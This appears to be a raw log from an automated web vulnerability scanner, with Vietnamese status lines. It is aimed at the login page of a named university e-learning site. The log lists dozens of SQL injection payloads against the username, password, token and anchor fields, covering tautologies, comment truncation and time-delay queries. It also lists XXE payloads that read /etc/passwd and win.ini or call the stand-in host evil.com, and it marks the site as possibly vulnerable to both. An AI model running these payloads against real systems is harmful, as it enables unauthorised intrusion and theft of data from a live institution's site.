[TIME] 2025-07-24 22:46:27
[URL] https://elearning.ctu.edu.vn/login/index.php
[SUMMARY] SQLi, XXE
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: https://elearning.ctu.edu.vn/login/index.php
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công SQLi với các payloads:
    - anchor=' OR '1'='1
    - logintoken=' OR '1'='1
    - username=' OR '1'='1
    - password=' OR '1'='1
    - anchor=" OR "1"="1
    - logintoken=" OR "1"="1
    - username=" OR "1"="1
    - password=" OR "1"="1
    - anchor=') OR ('1'='1
    - logintoken=') OR ('1'='1
    - username=') OR ('1'='1
    - password=') OR ('1'='1
    - anchor=" OR 1=1 --
    - logintoken=" OR 1=1 --
    - username=" OR 1=1 --
    - password=" OR 1=1 --
    - anchor=' OR 1=1#
    - logintoken=' OR 1=1#
    - username=' OR 1=1#
    - password=' OR 1=1#
    - anchor=" OR 1=1#
    - logintoken=" OR 1=1#
    - username=" OR 1=1#
    - password=" OR 1=1#
    - anchor=admin' --
    - logintoken=admin' --
    - username=admin' --
    - password=admin' --
    - anchor=1' or '1' = '1
    - logintoken=1' or '1' = '1
    - username=1' or '1' = '1
    - password=1' or '1' = '1
    - anchor=' AND 1=1 --
    - logintoken=' AND 1=1 --
    - username=' AND 1=1 --
    - password=' AND 1=1 --
    - anchor=' AND 1=2 --
    - logintoken=' AND 1=2 --
    - username=' AND 1=2 --
    - password=' AND 1=2 --
    - anchor=" AND 1=1 --
    - logintoken=" AND 1=1 --
    - username=" AND 1=1 --
    - password=" AND 1=1 --
    - anchor=" AND 1=2 --
    - logintoken=" AND 1=2 --
    - username=" AND 1=2 --
    - password=" AND 1=2 --
    - anchor=') AND '1'='1
    - logintoken=') AND '1'='1
    - username=') AND '1'='1
    - password=') AND '1'='1
    - anchor=') AND '1'='2
    - logintoken=') AND '1'='2
    - username=') AND '1'='2
    - password=') AND '1'='2
    - anchor=" OR "" = "
    - logintoken=" OR "" = "
    - username=" OR "" = "
    - password=" OR "" = "
    - anchor=' OR '' = '
    - logintoken=' OR '' = '
    - username=' OR '' = '
    - password=' OR '' = '
    - anchor='; WAITFOR DELAY '0:0:5' --
    - logintoken='; WAITFOR DELAY '0:0:5' --
    - username='; WAITFOR DELAY '0:0:5' --
    - password='; WAITFOR DELAY '0:0:5' --
    - anchor='; SELECT pg_sleep(5)--
    - logintoken='; SELECT pg_sleep(5)--
    - username='; SELECT pg_sleep(5)--
    - password='; SELECT pg_sleep(5)--
    - anchor=" OR SLEEP(5) --
    - logintoken=" OR SLEEP(5) --
    - username=" OR SLEEP(5) --
    - password=" OR SLEEP(5) --
    - anchor=') OR SLEEP(5) --
    - logintoken=') OR SLEEP(5) --
    - username=') OR SLEEP(5) --
    - password=') OR SLEEP(5) --
    - anchor=" OR 1=1; SLEEP(5) --
    - logintoken=" OR 1=1; SLEEP(5) --
    - username=" OR 1=1; SLEEP(5) --
    - password=" OR 1=1; SLEEP(5) --
    - anchor=admin' OR SLEEP(3)--
    - logintoken=admin' OR SLEEP(3)--
    - username=admin' OR SLEEP(3)--
    - password=admin' OR SLEEP(3)--
    - anchor=1); SELECT sleep(5);--
    - logintoken=1); SELECT sleep(5);--
    - username=1); SELECT sleep(5);--
    - password=1); SELECT sleep(5);--


======= XSS =======
[*] Đang kiểm tra XSS trên: https://elearning.ctu.edu.vn/login/index.php
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[✓] Không phát hiện lỗ hổng XSS.


======= LFI =======
[*] Đang kiểm tra LFI trên: https://elearning.ctu.edu.vn/login/index.php
[✓] Không phát hiện lỗ hổng LFI.


======= CMDi =======
[*] Đang kiểm tra Command Injection trên: https://elearning.ctu.edu.vn/login/index.php
[✓] Không phát hiện lỗ hổng CMDi.


======= XXE =======
[*] Đang kiểm tra XXE trên: https://elearning.ctu.edu.vn/login/index.php
[!] Có thể bị tấn công XXE với các payloads:
    - <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://evil.com/evil"> %xxe; ]>
    - <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
    - <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    - <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://evil.com/evil"> ]>
    - <?xml version="1.0" ?>
    - <foo>&xxe;</foo>
    - <foo>test</foo>


